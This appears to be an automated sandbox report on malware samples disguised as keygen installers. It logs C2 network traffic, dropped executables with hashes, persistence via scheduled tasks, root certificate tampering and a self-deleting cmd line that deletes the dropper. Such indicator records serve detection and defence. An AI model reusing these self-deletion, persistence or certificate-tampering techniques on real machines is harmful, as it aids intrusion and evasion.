US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

memory/1016-0-0x0000000074F9E000-0x0000000074F9F000-memory.dmp

memory/1016-1-0x00000000009A0000-0x0000000000B76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/4068-13-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp

memory/4068-15-0x0000000000840000-0x0000000000850000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/3412-39-0x00000000004F0000-0x00000000004F8000-memory.dmp

memory/1696-38-0x0000000000DE0000-0x0000000000E00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/1696-45-0x00000000016A0000-0x00000000016BA000-memory.dmp

memory/1696-49-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/1696-60-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

memory/4068-61-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp

memory/2264-62-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/4068-65-0x00000000011F0000-0x00000000011FE000-memory.dmp

memory/4068-66-0x0000000001240000-0x0000000001252000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/3696-96-0x0000000000B90000-0x0000000000B96000-memory.dmp

memory/5048-98-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-101-0x00000000029B0000-0x00000000029D0000-memory.dmp

memory/5048-100-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-104-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-105-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-103-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-102-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-106-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-107-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-109-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-110-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5048-116-0x0000000140000000-0x0000000140786000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
US 104.26.2.46:443 iplogger.org tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

memory/2648-0-0x00000000000F0000-0x0000000000108000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2164 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2164 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2164 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/2164-0-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/4756-12-0x0000000000D60000-0x0000000000E45000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Roaming\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\services64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\services64.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1552 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2816 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2816 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2816 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2884 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2884 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2884 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2816 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 2816 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 2816 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 876 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 876 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 876 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 876 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 876 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 876 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
